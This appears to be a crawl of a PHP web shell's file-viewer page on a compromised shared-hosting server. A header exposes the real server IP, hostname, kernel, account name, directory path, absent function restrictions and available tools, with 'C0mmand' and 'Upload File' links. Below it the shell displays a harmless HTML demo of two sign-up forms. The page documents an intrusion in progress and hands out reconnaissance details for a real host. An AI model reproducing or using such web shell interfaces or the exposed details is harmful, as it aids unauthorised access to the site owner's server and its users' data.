Server IP : 103.53.40.154 / Your IP : 18.221.167.11 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/digitala2z.com/form/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8"> <title>A Pen by Prasanth</title> <link rel="stylesheet" href="css/style.css"> </head> <body> <!-- First Form --> <h2>Example 1:</h2> <form id="first_form" method="post" action=""> <div> <label for="first_name">First Name:</label> <input type="text" id="first_name" name="first_name"></input> </div> <div> <label for="last_name">Last Name:</label> <input type="text" id="last_name" name="last_name"></input> </div> <div> <label for="email">Email:</label> <input type="email" id="email" name="email"></input> </div> <div> <label for="password">Password:</label> <input type="password" id="password" name="password"></input> </div> <div> <input type="submit" value="Submit" /> </div> </form> <hr/> <!-- Second Form --> <h2>Example 2:</h2> <form id="second_form" method="post" action=""> <div> <label for="fname">First Name:</label> <input type="text" id="fname" name="fname"></input> </div> <div> <label for="lname">Last Name:</label> <input type="text" id="lname" name="lname"></input> </div> <div> <label for="user_email">Email:</label> <input type="email" id="user_email" name="user_email"></input> </div> <div> <label for="psword">Password:</label> <input type="password" id="psword" name="psword"></input> </div> <div> <input type="submit" value="Submit" /> </div> </form> <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js'></script> <script src='https://cdn.jsdelivr.net/jquery.validation/1.16.0/jquery.validate.min.js'></script> <script src="js/index.js"></script> </body> </html>